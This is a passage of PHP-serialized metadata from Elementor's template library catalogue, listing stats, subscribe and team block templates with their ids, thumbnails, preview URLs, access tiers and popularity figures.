product\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:615;s:16:\"popularity_index\";i:123;s:11:\"trend_index\";i:81;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:760;a:21:{s:4:\"tmpl\";i:551;s:2:\"id\";i:6079;s:5:\"title\";s:7:\"Stats 3\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_4.png\";s:12:\"tmpl_created\";i:1520443651;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/stats-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";i:616;s:16:\"popularity_index\";i:284;s:11:\"trend_index\";i:385;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:761;a:21:{s:4:\"tmpl\";i:552;s:2:\"id\";i:6089;s:5:\"title\";s:7:\"Stats 4\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_5.png\";s:12:\"tmpl_created\";i:1520443653;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/stats-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:617;s:16:\"popularity_index\";i:205;s:11:\"trend_index\";i:452;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:762;a:21:{s:4:\"tmpl\";i:549;s:2:\"id\";i:6063;s:5:\"title\";s:7:\"Stats 5\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_2.png\";s:12:\"tmpl_created\";i:1520443647;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/stats-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";i:618;s:16:\"popularity_index\";i:181;s:11:\"trend_index\";i:419;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:763;a:21:{s:4:\"tmpl\";i:553;s:2:\"id\";i:6097;s:5:\"title\";s:7:\"Stats 6\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_black_2.png\";s:12:\"tmpl_created\";i:1520443655;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/stats-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";i:619;s:16:\"popularity_index\";i:264;s:11:\"trend_index\";i:492;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:764;a:21:{s:4:\"tmpl\";i:538;s:2:\"id\";i:5956;s:5:\"title\";s:7:\"Stats 7\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_black_1.png\";s:12:\"tmpl_created\";i:1520443623;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/stats-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:620;s:16:\"popularity_index\";i:532;s:11:\"trend_index\";i:541;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:765;a:21:{s:4:\"tmpl\";i:537;s:2:\"id\";i:5947;s:5:\"title\";s:7:\"Stats 8\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_1.png\";s:12:\"tmpl_created\";i:1520443621;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/stats-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:621;s:16:\"popularity_index\";i:368;s:11:\"trend_index\";i:531;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:766;a:21:{s:4:\"tmpl\";i:559;s:2:\"id\";i:6152;s:5:\"title\";s:7:\"Stats 9\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_black_1.png\";s:12:\"tmpl_created\";i:1520443666;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/stats-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:622;s:16:\"popularity_index\";i:272;s:11:\"trend_index\";i:557;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:767;a:21:{s:4:\"tmpl\";i:469;s:2:\"id\";i:5157;s:5:\"title\";s:11:\"Subscribe 1\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/subscribe_white_1.png\";s:12:\"tmpl_created\";i:1520443448;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/subscribe-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"subscribe\";s:4:\"tags\";s:20:\"[\"Form\",\"Subscribe\"]\";s:10:\"menu_order\";i:623;s:16:\"popularity_index\";i:340;s:11:\"trend_index\";i:293;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:768;a:21:{s:4:\"tmpl\";i:472;s:2:\"id\";i:5181;s:5:\"title\";s:11:\"Subscribe 2\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/subscribe_black_2.png\";s:12:\"tmpl_created\";i:1520443454;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/subscribe-2-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"subscribe\";s:4:\"tags\";s:20:\"[\"Form\",\"Subscribe\"]\";s:10:\"menu_order\";i:624;s:16:\"popularity_index\";i:451;s:11:\"trend_index\";i:340;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:769;a:21:{s:4:\"tmpl\";i:470;s:2:\"id\";i:5165;s:5:\"title\";s:11:\"Subscribe 3\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/subscribe_black_1.png\";s:12:\"tmpl_created\";i:1520443450;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/subscribe-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"subscribe\";s:4:\"tags\";s:20:\"[\"Form\",\"Subscribe\"]\";s:10:\"menu_order\";i:625;s:16:\"popularity_index\";i:520;s:11:\"trend_index\";i:620;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:770;a:21:{s:4:\"tmpl\";i:477;s:2:\"id\";i:5222;s:5:\"title\";s:11:\"Subscribe 4\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/subscribe_black_3.png\";s:12:\"tmpl_created\";i:1520443464;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/subscribe-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"subscribe\";s:4:\"tags\";s:20:\"[\"Form\",\"Subscribe\"]\";s:10:\"menu_order\";i:626;s:16:\"popularity_index\";i:397;s:11:\"trend_index\";i:427;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:771;a:21:{s:4:\"tmpl\";i:471;s:2:\"id\";i:5173;s:5:\"title\";s:11:\"Subscribe 5\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2018/03/subscribe_white_2.png\";s:12:\"tmpl_created\";i:1520443452;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/subscribe-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"subscribe\";s:4:\"tags\";s:20:\"[\"Form\",\"Subscribe\"]\";s:10:\"menu_order\";i:627;s:16:\"popularity_index\";i:261;s:11:\"trend_index\";i:237;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:772;a:21:{s:4:\"tmpl\";i:465;s:2:\"id\";i:4801;s:5:\"title\";s:7:\"Team 11\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_black_8.png\";s:12:\"tmpl_created\";i:1520443369;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/team-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:628;s:16:\"popularity_index\";i:332;s:11:\"trend_index\";i:188;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:773;a:21:{s:4:\"tmpl\";i:462;s:2:\"id\";i:4770;s:5:\"title\";s:7:\"Team 12\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_6.png\";s:12:\"tmpl_created\";i:1520443364;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/team-12-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:629;s:16:\"popularity_index\";i:432;s:11:\"trend_index\";i:488;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:774;a:21:{s:4:\"tmpl\";i:458;s:2:\"id\";i:4727;s:5:\"title\";s:7:\"Team 13\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_black_2.png\";s:12:\"tmpl_created\";i:1520443356;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/team-13/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:630;s:16:\"popularity_index\";i:375;s:11:\"trend_index\";i:345;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:775;a:21:{s:4:\"tmpl\";i:543;s:2:\"id\";i:5999;s:5:\"title\";s:7:\"Team 14\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/team_black_10.png\";s:12:\"tmpl_created\";i:1520443634;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/team-14/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:631;s:16:\"popularity_index\";i:110;s:11:\"trend_index\";i:318;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:776;a:21:{s:4:\"tmpl\";i:455;s:2:\"id\";i:4698;s:5:\"title\";s:7:\"Team 15\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_black_1.png\";s:12:\"tmpl_created\";i:1520443350;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/team-15/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:632;s:16:\"popularity_index\";i:449;s:11:\"trend_index\";i:410;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:777;a:21:{s:4:\"tmpl\";i:463;s:2:\"id\";i:4781;s:5:\"title\";s:7:\"Team 16\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_7.png\";s:12:\"tmpl_created\";i:1520443365;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/team-16/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:633;s:16:\"popularity_index\";i:267;s:11:\"trend_index\";i:330;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:778;a:21:{s:4:\"tmpl\";i:558;s:2:\"id\";i:6144;s:5:\"title\";s:7:\"Team 17\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_11.png\";s:12:\"tmpl_created\";i:1520443664;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/team-17/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:634;s:16:\"popularity_index\";i:166;s:11:\"trend_index\";i:365;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:779;a:21:{s:4:\"tmpl\";i:464;s:2:\"id\";i:4793;s:5:\"title\";s:7:\"Team 18\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_8.png\";s:12:\"tmpl_created\";i:1520443367;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/team-18/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:635;s:16:\"popularity_index\";i:207;s:11:\"trend_index\";i:173;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:780;a:21:{s:4:\"tmpl\";i:466;s:2:\"id\";i:4809;s:5:\"title\";s:7:\"Team 19\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_9.png\";s:12:\"tmpl_created\";i:1520443371;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/team-19/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:636;s:16:\"popularity_index\";i:300;s:11:\"trend_index\";i:465;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:781;a:21:{s:4:\"tmpl\";i:459;s:2:\"id\";i:4736;s:5:\"title\";s:7:\"Team 20\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_4.png\";s:12:\"tmpl_created\";i:1520443358;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/team-20/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:637;s:16:\"popularity_index\";i:144;s:11:\"trend_index\";i:159;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:782;a:21:{s:4:\"tmpl\";i:467;s:2:\"id\";i:4818;s:5:\"title\";s:7:\"Team 21\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_black_9.png\";s:12:\"tmpl_created\";i:1520443373;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/team-21/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:638;s:16:\"popularity_index\";i:515;s:11:\"trend_index\";i:606;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:783;a:21:{s:4:\"tmpl\";i:461;s:2:\"id\";i:4759;s:5:\"title\";s:7:\"Team 22\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_5.png\";s:12:\"tmpl_created\";i:1520443362;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/team-22/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:639;s:16:\"popularity_index\";i:299;s:11:\"trend_index\";i:376;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:784;a:21:{s:4:\"tmpl\";i:460;s:2:\"id\";i:4746;s:5:\"title\";s:7:\"Team 23\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_black_4.png\";s:12:\"tmpl_created\";i:1520443360;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/team-23/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:640;s:16:\"popularity_index\";i:282;s:11:\"trend_index\";i:378;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:785;a:21:{s:4:\"tmpl\";i:457;s:2:\"id\";i:4718;s:5:\"title\";s:6:\"Team 4\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_3.png\";s:12:\"tmpl_created\";i:1520443354;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/team-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:641;s:16:\"popularity_index\";i:192;s:11:\"trend_index\";i:359;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:786;a:21:{s:4:\"tmpl\";i:456;s:2:\"id\";i:4706;s:5:\"title\";s:6:\"Team 5\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_2.png\";s:12:\"tmpl_created\";i:1520443352;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/team-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:642;s:16:\"popularity_index\";i:149;s:11:\"trend_index\";i:299;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:787;a:21:{s:4:\"tmpl\";i:544;s:2:\"id\";i:6008;s:5:\"title\";s:6:\"Team 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_10.png\";s:12:\"tmpl_created\";i:1520443636;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/team-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:643;s:16:\"popularity_index\";i:75;s:11:\"trend_index\";i:277;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:788;a:21:{s:4:\"tmpl\";i:454;s:2:\"id\";i:4690;s:5:\"title\";s:6:\"Team 